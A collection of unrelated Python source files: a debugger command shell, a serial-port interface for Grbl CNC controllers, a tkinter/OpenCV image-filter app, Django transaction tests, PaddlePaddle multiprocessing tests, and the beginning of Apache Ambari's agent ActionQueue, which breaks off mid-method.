"""Schedule task for re-execution. The re-execution may not be the next result"""
self.next_action.result = NextAction.REDO
return True
do_r = do_redo
def evaluate(self, args):
try:
return eval(args, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def do_pprint(self, args):
"""Pretty Print"""
try:
result = self.evaluate(args)
display.display(pprint.pformat(result))
except Exception:
pass
do_p = do_pprint
def execute(self, args):
try:
code = compile(args + '\n', '<stdin>', 'single')
exec(code, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def default(self, line):
try:
self.execute(line)
except Exception:
pass
|
interface.py
|
"""
Gerbil - Copyright (c) 2015 Michael Franzl
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import serial
import time
import threading
import logging
class Interface:
"""Implements opening, closing, writing and threaded reading from the serial port. Read data are put into a Thread Queue.
"""
def __init__(self, name, path, baud=115200):
"""Straightforward initialization tasks.
@param name
An informal name of the instance. Useful if you are running
several instances to control several serial ports at once.
It is only used for logging output and UI messages.
@param path
The serial port device node living under /dev.
e.g. /dev/ttyACM0 or /dev/ttyUSB0
@param baud
The baud rate. Default is 115200 for Grbl > v0.9i.
"""
self.name = name
self.path = path
self.baud = baud
self.queue = None
self.logger = logging.getLogger("gerbil.interface")
self._buf_receive = ""
self._do_receive = False
def start(self, queue):
"""
Open the device node and start a Thread for reading.
@param queue
An instance of Python3's `Queue()` class.
"""
self.queue = queue
self.logger.info("%s: connecting to %s with baudrate %i", self.name, self.path, self.baud)
self.serialport = serial.Serial(self.path, self.baud, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1, writeTimeout=0)
self.serialport.flushInput()
self.serialport.flushOutput()
self._do_receive = True
self.serial_thread = threading.Thread(target=self._receiving)
self.serial_thread.start()
def stop(self):
"""
Close the device node and shut down the reading Thread.
"""
self._do_receive = False
self.logger.info("%s: stop()", self.name)
self.serial_thread.join()
self.logger.info("%s: JOINED thread", self.name)
self.logger.info("%s: Closing port", self.name)
self.serialport.flushInput()
self.serialport.flushOutput()
self.serialport.close()
def write(self, data):
"""
Write `data` to the device node. If data is empty, no write is performed. The number of written characters is returned.
"""
if len(data) > 0:
num_written = self.serialport.write(bytes(data,"ascii"))
return num_written
else:
self.logger.debug("%s: nothing to write", self.name)
def _receiving(self):
while self._do_receive == True:
data = self.serialport.read(1)
waiting = self.serialport.inWaiting()
data += self.serialport.read(waiting)
self._handle_data(data)
def _handle_data(self, data):
try:
asci = data.decode("ascii")
except UnicodeDecodeError:
self.logger.info("%s: Received a non-ascii byte. Probably junk. Dropping it.", self.name)
asci = ""
for i in range(0, len(asci)):
char = asci[i]
self._buf_receive += char
# not all received lines are complete (end with \n)
if char == "\n":
self.queue.put(self._buf_receive.strip())
self._buf_receive = ""
|
app.py
|
from tkinter import *
from PIL import Image
import tkinter.messagebox
from PIL import ImageTk
from PIL import *
from tkinter import filedialog
import threading
from tkinter.ttk import Combobox
from PIL import ImageFilter
import cv2
import numpy as np
class Img_filter:
def __init__(self,root):
self.root=root
self.root.title("Image filter")
self.root.geometry("500x400")
self.root.iconbitmap("logo328.ico")
self.root.resizable(0,0)
save=StringVar()
color=StringVar()
fil=StringVar()
def browse():
global filename
global photo_image
file_path = filedialog.askopenfilename(title = "Select file",filetypes = (("Jpeg files","*.jpg"),("png files","*.png"),("all files","*.*")))
filename =file_path
self.original = Image.open(file_path)
resized = self.original.resize((355,160),Image.ANTIALIAS)
self.image = ImageTk.PhotoImage(resized)
photo_image=Label(firstframe,image=self.image,bd=2)
photo_image.place(x=65,y=65)
def convert():
try:
if len(filename)!=0:
if save.get()!="":
if fil.get()!="Select Filter":
if fil.get()=="Edges":
img=cv2.imread(filename)
gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
gray=cv2.medianBlur(gray,5)
edges=cv2.adaptiveThreshold(gray,250,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,9,9)
cv2.imwrite("{}.png".format(save.get()),edges)
cv2.waitKey(0)
cv2.destroyAllWindows()
if fil.get()=="Cartoon":
img=cv2.imread(filename)
color=cv2.bilateralFilter(img,9,250,250)
gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
gray=cv2.medianBlur(gray,5)
edges=cv2.adaptiveThreshold(gray,250,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,9,9)
cartoon=cv2.bitwise_and(color,color,mask=edges)
cv2.imwrite("{}.png".format(save.get()),cartoon)
cv2.waitKey(0)
cv2.destroyAllWindows()
else:
tkinter.messagebox.showerror("Error","Please Select the filter")
else:
tkinter.messagebox.showerror("Error","Please Enter Save Name")
else:
tkinter.messagebox.showerror("Error","Please Select Image")
except Exception as e:
tkinter.messagebox.showerror("Error",e)
def thread_convert():
t=threading.Thread(target=convert)
t.start()
def on_enter1(e):
but_convert_ascii['background']="black"
but_convert_ascii['foreground']="cyan"
def on_leave1(e):
but_convert_ascii['background']="SystemButtonFace"
but_convert_ascii['foreground']="SystemButtonText"
def on_enter2(e):
but_clear['background']="black"
but_clear['foreground']="cyan"
def on_leave2(e):
but_clear['background']="SystemButtonFace"
but_clear['foreground']="SystemButtonText"
def on_enter3(e):
but_Browse['background']="black"
but_Browse['foreground']="cyan"
def on_leave3(e):
but_Browse['background']="SystemButtonFace"
but_Browse['foreground']="SystemButtonText"
def clear():
save.set("")
photo_image.config(image="")
lab_success.config(text="")
fil.set("Select Filter")
color.set("Select Color")
#==========================frame=================================================#
mainframe=Frame(self.root,width=500,height=400,relief="ridge",bd=3)
mainframe.place(x=0,y=0)
firstframe=Frame(mainframe,width=493,height=350,relief="ridge",bd=3,bg="black")
firstframe.place(x=0,y=0)
secondframe=Frame(mainframe,width=493,height=45,relief="ridge",bd=3)
secondframe.place(x=0,y=350)
#===========================firstframe==================================================#
but_Browse=Button(firstframe,text="Browse",width=15,font=('times new roman',12),cursor="hand2",command=browse)
but_Browse.place(x=170,y=10)
but_Browse.bind("<Enter>",on_enter3)
but_Browse.bind("<Leave>",on_leave3)
global photo_image
self.original = Image.open("C:/Users/SHREYAS/Desktop/shreyas python/img_ascii/black.png")
resized = self.original.resize((355,160),Image.ANTIALIAS)
self.image = ImageTk.PhotoImage(resized)
#bglab=Label(F1,image=self.image,bd=2).place(x=0,y=0)
photo_image=Label(firstframe,image=self.image,bd=2)
photo_image.place(x=65,y=65)
lab_save=Label(firstframe,text="Save As Name",font=('times new roman',12),bg="black",fg="white")
lab_save.place(x=30,y=250)
ent_save=Entry(firstframe,width=30,font=('times new roman',12),relief="ridge",bd=3,textvariable=save)
ent_save.place(x=170,y=250)
lab_success=Label(firstframe,text="",font=('times new roman',12),bg="black",fg="white")
lab_success.place(x=120,y=300)
lab_please_filter=Label(firstframe,text="Please Select Filter",font=('times new roman',12),bg="black",fg="white")
lab_please_filter.place(x=30,y=300)
filters=['Edges',"Cartoon"]
filters_combo=Combobox(firstframe,values=filters,font=('arial',14),width=14,state="readonly",textvariable=fil)
filters_combo.set("Select Filter")
filters_combo.place(x=200,y=300)
#=========================secondframe==================================================#
but_convert_ascii=Button(secondframe,width=18,text="Convert Image",font=('times new roman',12),cursor="hand2",command=thread_convert)
but_convert_ascii.place(x=40,y=5)
but_convert_ascii.bind("<Enter>",on_enter1)
but_convert_ascii.bind("<Leave>",on_leave1)
but_clear=Button(secondframe,width=18,text="Clear",font=('times new roman',12),cursor="hand2",command=clear)
but_clear.place(x=270,y=5)
but_clear.bind("<Enter>",on_enter2)
but_clear.bind("<Leave>",on_leave2)
if __name__ == "__main__":
root=Tk()
Img_filter(root)
root.mainloop()
|
tests.py
|
from __future__ import unicode_literals
import sys
import threading
import time
from unittest import skipIf, skipUnless
from django.db import (connection, transaction,
DatabaseError, Error, IntegrityError, OperationalError)
from django.test import TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature
from django.utils import six
from .models import Reporter
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicTests(TransactionTestCase):
"""
Tests for the atomic decorator and context manager.
The tests make assertions on internal attributes because there isn't a
robust way to ask the database for its current transaction state.
Since the decorator syntax is converted into a context manager (see the
implementation), there are only a few basic tests with the decorator
syntax and the bulk of the tests use the context manager syntax.
"""
available_apps = ['transactions']
def test_decorator_syntax_commit(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_decorator_syntax_rollback(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_alternate_decorator_syntax_commit(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_alternate_decorator_syntax_rollback(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: Archibald Haddock>', '<Reporter: Tintin>'])
def test_nested_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_nested_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic():
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: Archibald Haddock>', '<Reporter: Tintin>'])
def test_merged_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
# Writes in the outer block are rolled back too.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_commit_commit(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with atomic:
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: Archibald Haddock>', '<Reporter: Tintin>'])
def test_reuse_commit_rollback(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_reuse_rollback_commit(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with atomic:
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_rollback_rollback(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_force_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
# atomic block shouldn't rollback, but force it.
self.assertFalse(transaction.get_rollback())
transaction.set_rollback(True)
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_prevent_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
sid = transaction.savepoint()
# trigger a database error inside an inner atomic without savepoint
with self.assertRaises(DatabaseError):
with transaction.atomic(savepoint=False):
with connection.cursor() as cursor:
cursor.execute(
"SELECT no_such_col FROM transactions_reporter")
# prevent atomic from rolling back since we're recovering manually
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
transaction.savepoint_rollback(sid)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
class AtomicInsideTransactionTests(AtomicTests):
"""All basic tests for atomic should also pass within an existing transaction."""
def setUp(self):
self.atomic = transaction.atomic()
self.atomic.__enter__()
def tearDown(self):
self.atomic.__exit__(*sys.exc_info())
@skipIf(connection.features.autocommits_when_autocommit_is_off,
"This test requires a non-autocommit mode that doesn't autocommit.")
class AtomicWithoutAutocommitTests(AtomicTests):
"""All basic tests for atomic should also pass when autocommit is turned off."""
def setUp(self):
transaction.set_autocommit(False)
def tearDown(self):
# The tests access the database after exercising 'atomic', initiating
# a transaction ; a rollback is required before restoring autocommit.
transaction.rollback()
transaction.set_autocommit(True)
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicMergeTests(TransactionTestCase):
"""Test merging transactions with savepoint=False."""
available_apps = ['transactions']
def test_merged_outer_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Calculus")
raise Exception("Oops, that's his last name")
# The third insert couldn't be roll back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The second insert couldn't be roll back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The first block has a savepoint and must roll back.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_inner_savepoint_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Calculus")
raise Exception("Oops, that's his last name")
# The third insert couldn't be roll back. Temporarily mark the
# connection as not needing rollback to check it.
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
self.assertEqual(Reporter.objects.count(), 3)
transaction.set_rollback(True)
# The second block has a savepoint and must roll back.
self.assertEqual(Reporter.objects.count(), 1)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicErrorsTests(TransactionTestCase):
available_apps = ['transactions']
def test_atomic_prevents_setting_autocommit(self):
autocommit = transaction.get_autocommit()
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.set_autocommit(not autocommit)
# Make sure autocommit wasn't changed.
self.assertEqual(connection.autocommit, autocommit)
def test_atomic_prevents_calling_transaction_methods(self):
with transaction.atomic():
with self.assertRaises(transaction.TransactionManagementError):
transaction.commit()
with self.assertRaises(transaction.TransactionManagementError):
transaction.rollback()
def test_atomic_prevents_queries_in_broken_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# The transaction is marked as needing rollback.
with self.assertRaises(transaction.TransactionManagementError):
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Haddock")
@skipIfDBFeature('atomic_transactions')
def test_atomic_allows_queries_after_fixing_transaction(self):
r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock")
with transaction.atomic():
r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id)
with self.assertRaises(IntegrityError):
r2.save(force_insert=True)
# Mark the transaction as no longer needing rollback.
transaction.set_rollback(False)
r2.save(force_update=True)
self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Calculus")
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_atomic_prevents_queries_in_broken_transaction_after_client_close(self):
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
connection.close()
# The connection is closed and the transaction is marked as
# needing rollback. This will raise an InterfaceError on databases
# that refuse to create cursors on closed connections (PostgreSQL)
# and a TransactionManagementError on other databases.
with self.assertRaises(Error):
Reporter.objects.create(first_name="Cuthbert", last_name="Calculus")
# The connection is usable again .
self.assertEqual(Reporter.objects.count(), 0)
@skipUnless(connection.vendor == 'mysql', "MySQL-specific behaviors")
class AtomicMySQLTests(TransactionTestCase):
available_apps = ['transactions']
@skipIf(threading is None, "Test requires threading")
def test_implicit_savepoint_rollback(self):
"""MySQL implicitly rolls back savepoints when it deadlocks (#22291)."""
other_thread_ready = threading.Event()
def other_thread():
try:
with transaction.atomic():
Reporter.objects.create(id=1, first_name="Tintin")
other_thread_ready.set()
# We cannot synchronize the two threads with an event here
# because the main thread locks. Sleep for a little while.
time.sleep(1)
# 2) ... and this line deadlocks. (see below for 1)
Reporter.objects.exclude(id=1).update(id=2)
finally:
# This is the thread-local connection, not the main connection.
connection.close()
other_thread = threading.Thread(target=other_thread)
other_thread.start()
other_thread_ready.wait()
with six.assertRaisesRegex(self, OperationalError, 'Deadlock found'):
# Double atomic to enter a transaction and create a savepoint.
with transaction.atomic():
with transaction.atomic():
# 1) This line locks... (see above for 2)
Reporter.objects.create(id=1, first_name="Tintin")
other_thread.join()
class AtomicMiscTests(TransactionTestCase):
available_apps = []
def test_wrap_callable_instance(self):
# Regression test for #20028
class Callable(object):
def __call__(self):
pass
# Must not raise an exception
transaction.atomic(Callable())
@skipUnlessDBFeature('can_release_savepoints')
def test_atomic_does_not_leak_savepoints_on_failure(self):
# Regression test for #23074
# Expect an error when rolling back a savepoint that doesn't exist.
# Done outside of the transaction block to ensure proper recovery.
with self.assertRaises(Error):
# Start a plain transaction.
with transaction.atomic():
# Swallow the intentional error raised in the sub-transaction.
with six.assertRaisesRegex(self, Exception, "Oops"):
# Start a sub-transaction with a savepoint.
with transaction.atomic():
sid = connection.savepoint_ids[-1]
raise Exception("Oops")
# This is expected to fail because the savepoint no longer exists.
connection.savepoint_rollback(sid)
|
test_paddle_multiprocessing.py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import gc
import sys
import unittest
import time
import paddle
import paddle.incubate.multiprocessing as mp
from paddle.fluid.framework import _test_eager_guard, _in_legacy_dygraph, in_dygraph_mode, _enable_legacy_dygraph
REPEAT = 20
HAS_SHM_FILES = os.path.isdir('/dev/shm')
def fill_tensor(queue, event):
# make sure run in legacy dygraph
if in_dygraph_mode():
_enable_legacy_dygraph()
data = queue.get()
with paddle.no_grad():
data[0][:] = 5
data[1][:] = 5
event.set()
def send_tensor(queue, event, device, dtype):
tensor = paddle.ones([5, 5], dtype=dtype)
queue.put(tensor)
queue.put(tensor)
event.wait()
def send_parambase(queue, event, device, dtype):
tensor = paddle.nn.Layer().create_parameter(
[5, 5],
dtype=dtype,
default_initializer=paddle.nn.initializer.Constant(value=1.0))
queue.put(tensor)
queue.put(tensor)
event.wait()
class leak_checker(object):
def __init__(self, test_case):
self.checked_pids = [os.getpid()]
self.test_case = test_case
def __enter__(self):
self.next_fds = self._get_next_fds(10)
return self
def __exit__(self, *args):
if args[0] is None:
self.test_case.assertFalse(self.has_shm_files())
return False
def check_pid(self, pid):
self.checked_pids.append(pid)
def _get_next_fds(self, n=1):
fds = [os.dup(0) for i in range(n)]
for fd in fds:
os.close(fd)
return fds
def has_shm_files(self, wait=True):
if not HAS_SHM_FILES:
return False
result = self._has_shm_files()
if result and wait:
time.sleep(0.5)
return self._has_shm_files()
return result
def _has_shm_files(self):
gc.collect()
names = ['paddle_' + str(pid) for pid in self.checked_pids]
for filename in os.listdir('/dev/shm'):
for name in names:
if filename.startswith(name):
print("have", filename)
return True
return False
class TestMultiprocessingBase(unittest.TestCase):
def get_tensor(self, device="cpu"):
self.device = device.lower()
place = None
tensor = paddle.zeros([5, 5], dtype="float32")
return tensor
def get_parameter(self):
w = paddle.nn.Layer().create_parameter(
[10, 10],
default_initializer=paddle.nn.initializer.Constant(value=0.0))
return w
def _test_empty(self, dtype="float32"):
q = mp.Queue()
empty = paddle.to_tensor([], dtype=dtype)
q.put(empty)
out = q.get(timeout=1)
self.assertEqual(str(out), str(empty))
def _test_sharing(self,
ctx=mp,
device='cpu',
dtype="float32",
repeat=1,
param=False):
def test_fill():
if param:
x = self.get_parameter()
y = (x[:, 1]).detach()
else:
x = self.get_tensor()
y = x[:, 1]
data = [x, y]
queue = ctx.Queue()
event = ctx.Event()
queue.put(data)
process = ctx.Process(target=fill_tensor, args=(queue, event))
process.daemon = True
lc.check_pid(process.pid)
process.start()
event.wait(30)
self.assertTrue(event.is_set())
self.assertTrue(data[0].equal(5).all())
self.assertTrue(data[1].equal(5).all())
process.join(1 if device != "gpu" else 10)
self.assertFalse(process.is_alive())
def test_receive():
queue = ctx.Queue()
event = ctx.Event()
process = ctx.Process(
target=send_parambase if param else send_tensor,
args=(queue, event, device, dtype))
process.daemon = True
lc.check_pid(process.pid)
process.start()
t1 = queue.get()
t2 = queue.get()
self.assertTrue(t1.equal(1).all())
del t1, t2
event.set()
process.join(1 if device != "gpu" else 10)
self.assertFalse(process.is_alive())
with leak_checker(self) as lc:
for _ in range(repeat):
test_fill()
test_receive()
class TestMultiprocessingCpu(TestMultiprocessingBase):
def func_test_pass_tensor(self):
if in_dygraph_mode():
return
paddle.set_device("cpu")
self._test_sharing(repeat=REPEAT)
def test_pass_tensor(self):
with _test_eager_guard():
self.func_test_pass_tensor()
self.func_test_pass_tensor()
def func_test_pass_parambase(self):
if in_dygraph_mode():
return
paddle.set_device("cpu")
self._test_sharing(repeat=1, param=True)
def test_pass_parambase(self):
with _test_eager_guard():
self.func_test_pass_parambase()
self.func_test_pass_parambase()
def func_test_pass_empty(self):
if in_dygraph_mode():
return
paddle.set_device("cpu")
self._test_empty()
def test_pass_empty(self):
with _test_eager_guard():
self.func_test_pass_empty()
self.func_test_pass_empty()
class TestMultiprocessingGpu(TestMultiprocessingBase):
@unittest.skipIf(not paddle.fluid.core.is_compiled_with_cuda(),
"core is not compiled with CUDA")
def func_test_pass_tensor(self):
if in_dygraph_mode():
return
paddle.set_device("gpu")
self._test_sharing(mp.get_context("spawn"), "gpu")
def test_pass_tensor(self):
with _test_eager_guard():
self.func_test_pass_tensor()
self.func_test_pass_tensor()
if __name__ == "__main__":
unittest.main()
|
ActionQueue.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import Queue
import logging
import traceback
import threading
import pprint
import os
import ambari_simplejson as json
import time
import signal
from AgentException import AgentException
from LiveStatus import LiveStatus
from ActualConfigHandler import ActualConfigHandler
from ambari_agent.BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_commons.str_utils import split_on_chunks
from resource_management.libraries.script import Script
logger = logging.getLogger()
installScriptHash = -1
MAX_SYMBOLS_PER_LOG_MESSAGE = 7900
class ActionQueue(threading.Thread):
""" Action Queue for the agent. We pick one command at a time from the queue
and execute it
Note: Action and command terms in this and related classes are used interchangeably
"""
# How many actions can be performed in parallel. Feel free to change
MAX_CONCURRENT_ACTIONS = 5
#How much time(in seconds) we need wait for new incoming execution command before checking
#status command queue
EXECUTION_COMMAND_WAIT_TIME = 2
STATUS_COMMAND = 'STATUS_COMMAND'
EXECUTION_COMMAND = 'EXECUTION_COMMAND'
AUTO_EXECUTION_COMMAND = 'AUTO_EXECUTION_COMMAND'
BACKGROUND_EXECUTION_COMMAND = 'BACKGROUND_EXECUTION_COMMAND'
ROLE_COMMAND_INSTALL = 'INSTALL'
ROLE_COMMAND_START = 'START'
ROLE_COMMAND_STOP = 'STOP'
ROLE_COMMAND_CUSTOM_COMMAND = 'CUSTOM_COMMAND'
CUSTOM_COMMAND_RESTART = 'RESTART'
CUSTOM_COMMAND_START = ROLE_COMMAND_START
IN_PROGRESS_STATUS = 'IN_PROGRESS'
COMPLETED_STATUS = 'COMPLETED'
FAILED_STATUS = 'FAILED'
def __init__(self, initializer_module):
super(ActionQueue, self).__init__()
self.commandQueue = Queue.Queue()
self.backgroundCommandQueue = Queue.Queue()
self.commandStatuses = initializer_module.commandStatuses
self.config = initializer_module.config
self.recovery_manager = initializer_module.recovery_manager
self.configTags = {}
self.stop_event = initializer_module.stop_event
self.tmpdir = self.config.get('agent', 'prefix')
self.customServiceOrchestrator = initializer_module.customServiceOrchestrator
self.parallel_execution = self.config.get_parallel_exec_option()
if self.parallel_execution == 1:
logger.info("Parallel execution is enabled, will execute agent commands in parallel")
self.lock = threading.Lock()
def put(self, commands):
for command in commands:
if not command.has_key('serviceName'):
command['serviceName'] = "null"
if not command.has_key('clusterId'):
command['clusterId'] = "null"
logger.info("Adding " + command['commandType'] + " for role " + \
command['role'] + " for service " + \
command['serviceName'] + " of cluster_id " + \
command['clusterId'] + " to the queue.")
if command['commandType'] == self.BACKGROUND_EXECUTION_COMMAND :
self.backgroundCommandQueue.put(self.createCommandHandle(command))
else:
self.commandQueue.put(command)
def interrupt(self):
self.commandQueue.put(None)
def cancel(self, commands):
for command in commands:
logger.info("Canceling command with taskId = {tid}".format(tid = str(command['target_task_id'])))
logger.debug(pprint.pformat(command))
task_id = command['target_task_id']
reason = command['reason']
# Remove from the command queue by task_id
queue = self.commandQueue
self.commandQueue = Queue.Queue()
while not queue.empty():
queued_command = queue.get(False)
if queued_command['taskId'] != task_id:
